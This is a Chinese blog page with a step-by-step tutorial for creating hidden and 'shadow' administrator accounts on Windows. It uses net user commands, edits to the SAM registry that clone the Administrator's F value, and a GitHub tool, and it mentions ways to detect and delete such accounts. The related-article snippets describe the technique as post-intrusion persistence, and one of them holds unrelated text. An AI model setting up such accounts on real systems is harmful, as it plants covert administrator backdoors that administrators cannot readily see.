Windows下创建隐藏账户、影子账户

最新推荐文章于 2024-05-14 20:43:37 发布
最新推荐文章于 2024-05-14 20:43:37 发布
阅读量3.3k 收藏 13
点赞数 1
分类专栏: 漏洞复现 文章标签: windows
原文链接:https://mp.weixin.qq.com/s/HDWKwkUbt3Imj7dEKXazkw
版权

方法一: 用户名后面加$符号

net user test$ password /add
net localgroup administrators test$ /add

此时使用命令net user 查看不到此用户,但使用 wmic命令可以

wmic useraccount get Name

 

此外,在控制面板也能看到此用户

 

可直接用命令删除

net user test$ /del

 

对于此方法,微软官方的回答是

 

方法二:修改注册表

前提是我们要基于方法一创建一个带$的账户。

win + r ,输入 regedit 打开注册表。路径为:HKEY_LOCAL_MARCHINE\SAM\SAM

默认情况下只有 system用户组 有控制注册表的权限。administrators组没有任何权限。system组是administrator组更高一级的存在,它拥有和administrator组一样甚至更高级的权限。查看用户组时不会显示,也不允许任何账户加入。存在目的是保证系统服务的运行,因此被赋予系统及系统级的权限。

 

此时打开SAM文件夹是不会显示下面的文件的。我们 右击SAM ,点击权限

赋予administrators组权限

 

 

点击应用-->确定。重新打开注册表。此时即可看见SAM的文件内容

 

此时我们要导出

  1. user下的administrator的隐藏文件,即 1F4

  2. user/name 下test$账户的文件

  3. user下的 test$ 账户的隐藏文件,在name下看到对应的是 3EC

右键导出即可。

用记事本打开1和3,将 administrator注册表文件中的F值覆盖到 test$账户的隐藏文件中去

 

 

保存后,删除 test$用户。

net user test$ /del

再双击test的两个注册表文件,将用户再次添加。

此时net user 和控制面板看不到 test$

但 net user test$ 能看到此用户,

注册表和 wmic useraccount get Name 也能看到

 

而且当电脑重启后,在计算机管理里也能看到刚刚创建的隐藏账号。

工具

项目地址:https://github.com/wgpsec/CreateHiddenAccount

使用方法

管理员权限运行
CreateHiddenAccount_v0.2.exe -c 检查是否有隐藏账户
CreateHiddenAccount_v0.2.exe -u test -p 123  创建名为test,密码为123的账户。会自动补上$
CreateHiddenAccount_v0.2.exe -d test$ 删除隐藏账户

 

 

原帖地址:一键创建隐藏账号

m0_46607055
关注
  • 1
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Windows 隐藏账户创建及删除
shatianyzg的博客
05-23 781
Windows 隐藏账户创建及删除
Windows隐藏账户处置
xdjxi的博客
12-15 443
PHP 算术运算符 运算符 名称 描述 实例 结果 x + y 加 x 和 y 的和 2 + 2 4 x - y 减 x 和 y 的差 5 - 2 3 x * y 乘 x 和 y 的积 5 * 2 10 x / y 除 x 和 y 的商 15 / 5 3 x % y 模(除法的余数) x 除以 y 的余数 5 % 2 10 % 8 10
windows 7使用注册表创建影子账户隐藏账户.docx
09-27
windows 7使用注册表创建影子账户隐藏账户.docx
探索CreateHiddenAccount:一款创新的网络安全工具
最新发布
2401_84968504的博客
05-14 460
是一个开源项目,旨在为用户提供一种安全、隐蔽的方式来隐藏和保护他们的账户信息。这个项目的核心是一个命令行工具,可以在本地系统上创建加密的隐藏账户,即使在被恶意软件或未经授权的用户访问时,也能保持数据的安全性。对于那些重视隐私和数据安全的用户而言,CreateHiddenAccount 是一个值得尝试的工具。通过其透明的开源模式,用户可以对其安全性有更深入的理解,并参与到项目的改进和发展中去。让我们一起探索这个工具,更好地守护我们的数字世界吧!
linux下新建用户后登录显示$及添加用户后开通ssh和sudo
DarcyZ_SSM的博客
10-23 667
新手问题笔记,持续更新
WINDOWS下新建账户以及在另一个账户下对原账户注册表等信息进行操作
weixin_44287398的博客
06-26 1124
WINDOWS下新建账户以及在另一个账户下对原账户注册表等信息进行操作
WIN10 修改系统用户
1226
04-24 9838
1、Win+R 打开命令窗口,输入 regedit,打开注册表, 根据此目录找到 ProfileList:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\ProfileList, 2、ProfileList 下有几个 S-1-5- ,找到 ProfileListPath 项,右键 - 修改,将你原来的用户名改为新的用户名,点击确认保存,关闭注册表。 3、修改完,我们需要去 C:\User,把新的用户名文件夹删了,再把原来的文件夹
Windows创建隐藏账户
weixin_44743506的博客
08-19 870
实验目的: 已经暂时获取管理员权限,想要创建一个隐藏账户(管理员权限),实现以下目的: 1、在登录界面不显示该账户信息 2、命令行执行net user命令,该用户也被隐藏 3、命令行执行net localgroup administrators 该用户也被隐藏 实验环境 windows xp(实验在其他系统也适用) 实验过程 一、添加用户 net user wangwu$123...
windows创建隐藏账户的方法
weixin_43330886的博客
10-03 4434
windows创建隐藏账户的方法 windows创建隐藏账户的方法 windows创建隐藏账户的方法 1.使用管理员打开CMD使用 net user admin$ 1211 /add(创建账户) net localgroup administrators admin$ /add(添加账户到管理员组) 2.运行注册表regedit依次展开【HKEY_LOCAL_MACHINE\SAM\SAM】...
windows 隐藏账户建立方法
08-05
windows上建立隐藏账户  其实,制作系统隐藏账户并不是十分高深的技术,利用我们平时经常用到的“命令提示符”就可以制作一个简单的隐藏账户。  点击“开始”→“运行”,输入“CMD”运行“命令提示符”,输入...
CreateHiddenAccount 创建隐藏账号
02-23
常见的创建隐藏账号的两种方法,一种是直接在用户名后加上 $ 符进行创建,一种是利用注册表克隆用户创建,第二种方法隐藏效果更好些,但是操作要复杂不少。 工具里除了添加隐藏账号外,还添加了检查隐藏账号、删除隐藏账号的功能,这样不管是红队还是蓝队都可以用到这款工具。
开通guest账户后开机登录隐藏guest账户
05-09
开通guest账户后开机登录隐藏guest账户
windows建立隐藏账户
04-02
windows建立隐藏账户
hideadmin_隐藏账户
01-13
hideadmin_隐藏账户,亲测真实有效,可用,如有侵权,请联系CSDN管理员删除即可
windows隐藏账号
Anonymous
01-19 1392
手动创建 1.添加$符 net user hacker$ Passw0rd /add net localgroup administrators hacker$ /add 但是在控制面板中可以查看到 使用 wmic 也可以查看 wmic useraccount get Name 删除用户 net user hacker$ /del 2.修改注册表 打开注册表 HKEY_LOCAL_MACHINE\SAM\SAM\ 关闭注册表再次打开 HKEY_LOCAL_MACHINE\SAM\SAM\Doma
内网渗透-windows权限维持
分享IT行业各种技术经验,从入门到入行,关注我学习更多知识。
02-27 484
在渗透的过程中,为了长期对目标有着控制权,就要学会权限维持的技能。隐藏用户、webshell、远控、记密码……
Windows权限维持--创建隐藏账户影子账户
qq_54735393的博客
11-03 3853
影子账户就是在windows中比较隐蔽的用户,一般在后渗透的权限维持阶段会用到。影子账户主要是利用在权限维持上,通过先建立带$符号账户,然后利用注册表修改里面的值,使得管理员无法通过cmd及计算机管理等地方查看攻击者所创建账户,从而实现权限维持。
windows影子账户
07-28
Windows影子账户是一种特殊类型的账户,用于在计算机上进行敏感操作或特权操作时提供临时权限。这种账户通常是为了增加安全性而创建的,因为它们在执行任务时不会保留记录或留下痕迹。 影子账户通常用于以下情况: 1. 特权操作:当需要进行系统配置、安装软件或执行其他需要管理员权限的操作时,可以使用影子账户来避免使用常规管理员账户。 2. 安全审计:通过使用影子账户,可以将特权操作的日志记录与普通用户的日志记录分开,以方便审计和追踪。 3. 高级威胁防御:在进行敏感操作时,使用影子账户可以减少攻击者对主要管理员账户的访问权限。 需要注意的是,影子账户在使用完毕后会自动删除,因此无法长期登录或用于一般使用。此外,具体的影子账户的配置和使用方式可能因不同的Windows版本而有所差异,建议在具体使用前查阅相关文档或参考安全指南。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值